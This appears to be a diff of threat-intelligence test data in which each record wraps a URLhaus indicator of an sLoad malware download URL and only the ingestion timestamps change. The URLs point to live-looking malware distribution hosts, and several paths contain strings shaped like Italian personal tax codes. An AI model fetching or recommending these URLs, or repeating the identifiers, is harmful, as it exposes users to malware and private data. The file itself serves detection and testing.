"{\"id\":\"961483\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961483/\",\"url\":\"https://belfetproduction.com/bella/CRSRRT61E15H501H/logo.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3220,7 +3220,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024941800Z", + "ingested": "2021-12-14T14:56:15.726411858Z", "original": "{\"id\":\"961484\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961484/\",\"url\":\"https://cxminute.com/minu/SMPMSM67P05F205U/it.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:15 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3266,7 +3266,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024948900Z", + "ingested": "2021-12-14T14:56:15.726412209Z", "original": "{\"id\":\"961480\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961480/\",\"url\":\"https://univirtek.com/viro/SBNPQL78A24A783E/uk.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3312,7 +3312,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024955700Z", + "ingested": "2021-12-14T14:56:15.726412585Z", "original": "{\"id\":\"961481\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961481/\",\"url\":\"https://cxminute.com/minu/15578761007/maps.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:51:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3358,7 +3358,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024962700Z", + "ingested": "2021-12-14T14:56:15.726413055Z", "original": "{\"id\":\"961478\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961478/\",\"url\":\"https://univirtek.com/viro/03079590133/1x1.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:51:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3404,7 +3404,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024969500Z", + "ingested": "2021-12-14T14:56:15.726413461Z", "original": "{\"id\":\"961479\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961479/\",\"url\":\"https://ladiesincode.com/ladi/BNCLNR77T56M082U/it.gif\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:51:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3450,7 +3450,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024976500Z", + "ingested": "2021-12-14T14:56:15.726413816Z", "original": "{\"id\":\"961476\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961476/\",\"url\":\"https://cxminute.com/minu/JNKMTJ64B29L424O/uk.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3496,7 +3496,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024983500Z", + "ingested": "2021-12-14T14:56:15.726414175Z", "original": "{\"id\":\"961477\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961477/\",\"url\":\"https://belfetproduction.com/bella/PGNMRA64S22I608Z/en.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:45 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3542,7 +3542,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024990300Z", + "ingested": "2021-12-14T14:56:15.726414552Z", "original": "{\"id\":\"961470\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961470/\",\"url\":\"https://cxminute.com/minu/RZKDRD77T23Z229T/logo.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3588,7 +3588,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.024997400Z", + "ingested": "2021-12-14T14:56:15.726415139Z", "original": "{\"id\":\"961471\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961471/\",\"url\":\"https://fhivelifestyle.online/nhbrwvdffsgt/adf/maps.jpg\",\"url_status\":\"offline\",\"host\":\"fhivelifestyle.online\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3634,7 +3634,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025004500Z", + "ingested": "2021-12-14T14:56:15.726415507Z", "original": "{\"id\":\"961472\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961472/\",\"url\":\"https://belfetproduction.com/bella/05739900487/1x1.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3680,7 +3680,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025011400Z", + "ingested": "2021-12-14T14:56:15.726415860Z", "original": "{\"id\":\"961473\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961473/\",\"url\":\"https://belfetproduction.com/bella/01767180597/map.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3726,7 +3726,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025018400Z", + "ingested": "2021-12-14T14:56:15.726416307Z", "original": "{\"id\":\"961474\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961474/\",\"url\":\"https://belfetproduction.com/bella/BRNGRG55D21F394K/map.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3772,7 +3772,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025025200Z", + "ingested": "2021-12-14T14:56:15.726416738Z", "original": "{\"id\":\"961475\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961475/\",\"url\":\"https://cxminute.com/minu/DLLTZN67L20L157J/1x1.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:43 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3818,7 +3818,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025032300Z", + "ingested": "2021-12-14T14:56:15.726417103Z", "original": "{\"id\":\"961468\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961468/\",\"url\":\"https://cxminute.com/minu/08035410722/logo.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3864,7 +3864,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025039200Z", + "ingested": "2021-12-14T14:56:15.726417462Z", "original": "{\"id\":\"961469\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961469/\",\"url\":\"https://univirtek.com/viro/GRNZEI60M13G346L/en.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:38 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3910,7 +3910,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025046300Z", + "ingested": "2021-12-14T14:56:15.726417820Z", "original": "{\"id\":\"961467\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961467/\",\"url\":\"https://letonguesc.com/leto/03253350239/1x1.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -3956,7 +3956,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025053300Z", + "ingested": "2021-12-14T14:56:15.726418275Z", "original": "{\"id\":\"961464\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961464/\",\"url\":\"https://ladiesincode.com/ladi/10582470158/uk.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4002,7 +4002,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025060200Z", + "ingested": "2021-12-14T14:56:15.726418682Z", "original": "{\"id\":\"961465\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961465/\",\"url\":\"https://ladiesincode.com/ladi/BTTLNZ68A56D325C/map.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4048,7 +4048,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025067Z", + "ingested": "2021-12-14T14:56:15.726419048Z", "original": "{\"id\":\"961466\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961466/\",\"url\":\"https://letonguesc.com/leto/NNTLRT68P28A717L/en.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:50:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4094,7 +4094,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025074Z", + "ingested": "2021-12-14T14:56:15.726419407Z", "original": "{\"id\":\"961461\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961461/\",\"url\":\"https://univirtek.com/viro/CTTNDR89A19B149W/maps.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4140,7 +4140,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025080900Z", + "ingested": "2021-12-14T14:56:15.726420065Z", "original": "{\"id\":\"961462\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961462/\",\"url\":\"https://cxminute.com/minu/DRSNTN77B16I197U/logo.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4186,7 +4186,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025087900Z", + "ingested": "2021-12-14T14:56:15.726420467Z", "original": "{\"id\":\"961463\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961463/\",\"url\":\"https://univirtek.com/viro/02941830735/uk.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4232,7 +4232,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025094700Z", + "ingested": "2021-12-14T14:56:15.726420825Z", "original": "{\"id\":\"961458\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961458/\",\"url\":\"https://belfetproduction.com/bella/MNSGCM91A04G240K/it.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4278,7 +4278,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025101600Z", + "ingested": "2021-12-14T14:56:15.726421171Z", "original": "{\"id\":\"961459\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961459/\",\"url\":\"https://ladiesincode.com/ladi/03108100615/it.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4324,7 +4324,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025108400Z", + "ingested": "2021-12-14T14:56:15.726421531Z", "original": "{\"id\":\"961460\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961460/\",\"url\":\"https://cxminute.com/minu/PTACSM56A31F604X/en.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4370,7 +4370,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025115300Z", + "ingested": "2021-12-14T14:56:15.726422069Z", "original": "{\"id\":\"961455\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961455/\",\"url\":\"https://univirtek.com/viro/00183050368/en.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4416,7 +4416,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025156600Z", + "ingested": "2021-12-14T14:56:15.726422425Z", "original": "{\"id\":\"961456\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961456/\",\"url\":\"https://cxminute.com/minu/TSNLSN58H30G912H/uk.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4462,7 +4462,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025165600Z", + "ingested": "2021-12-14T14:56:15.726422784Z", "original": "{\"id\":\"961457\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961457/\",\"url\":\"https://letonguesc.com/leto/08658331007/blank.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:39 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4508,7 +4508,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025172700Z", + "ingested": "2021-12-14T14:56:15.726423155Z", "original": "{\"id\":\"961450\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961450/\",\"url\":\"https://cxminute.com/minu/01098910324/blank.png\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4554,7 +4554,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025179500Z", + "ingested": "2021-12-14T14:56:15.726423518Z", "original": "{\"id\":\"961451\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961451/\",\"url\":\"https://univirtek.com/viro/02794390233/uk.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4600,7 +4600,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025186300Z", + "ingested": "2021-12-14T14:56:15.726423878Z", "original": "{\"id\":\"961452\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961452/\",\"url\":\"https://univirtek.com/viro/CSTDNT69D63F754D/en.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4646,7 +4646,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025195200Z", + "ingested": "2021-12-14T14:56:15.726424255Z", "original": "{\"id\":\"961453\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961453/\",\"url\":\"https://univirtek.com/viro/GSTGNE91B06L219W/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4692,7 +4692,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025202300Z", + "ingested": "2021-12-14T14:56:15.726424615Z", "original": "{\"id\":\"961454\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961454/\",\"url\":\"https://univirtek.com/viro/03610140125/map.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4738,7 +4738,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025209200Z", + "ingested": "2021-12-14T14:56:15.726424974Z", "original": "{\"id\":\"961448\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961448/\",\"url\":\"https://belfetproduction.com/bella/CRRLRD74E09A462T/blank.png\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:49:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4784,7 +4784,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025216100Z", + "ingested": "2021-12-14T14:56:15.726425722Z", "original": "{\"id\":\"961449\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961449/\",\"url\":\"https://univirtek.com/viro/RSTFRZ57T05G337C/maps.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4830,7 +4830,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025223Z", + "ingested": "2021-12-14T14:56:15.726426076Z", "original": "{\"id\":\"961447\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961447/\",\"url\":\"https://letonguesc.com/leto/LBRFNC56S10D952D/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4876,7 +4876,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025229900Z", + "ingested": "2021-12-14T14:56:15.726426434Z", "original": "{\"id\":\"961444\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961444/\",\"url\":\"https://univirtek.com/viro/01669890194/it.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4922,7 +4922,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025236800Z", + "ingested": "2021-12-14T14:56:15.726426782Z", "original": "{\"id\":\"961445\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961445/\",\"url\":\"https://letonguesc.com/leto/GTNNTN60P12H632S/maps.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -4968,7 +4968,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025243600Z", + "ingested": "2021-12-14T14:56:15.726427251Z", "original": "{\"id\":\"961446\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961446/\",\"url\":\"https://cxminute.com/minu/ZHOXBN72B06Z210N/en.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:49:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5014,7 +5014,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025250500Z", + "ingested": "2021-12-14T14:56:15.726427703Z", "original": "{\"id\":\"961442\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961442/\",\"url\":\"https://letonguesc.com/leto/KHNGGR61S21Z112Y/uk.css\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5060,7 +5060,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025257300Z", + "ingested": "2021-12-14T14:56:15.726428075Z", "original": "{\"id\":\"961443\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961443/\",\"url\":\"https://ladiesincode.com/ladi/MNRMNL75A12I531F/uk.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5106,7 +5106,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025264200Z", + "ingested": "2021-12-14T14:56:15.726428433Z", "original": "{\"id\":\"961438\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961438/\",\"url\":\"https://ladiesincode.com/ladi/RBGMNL67A02L675L/uk.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5152,7 +5152,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025271100Z", + "ingested": "2021-12-14T14:56:15.726428784Z", "original": "{\"id\":\"961439\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961439/\",\"url\":\"https://letonguesc.com/leto/RSSPPL67P15G535L/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 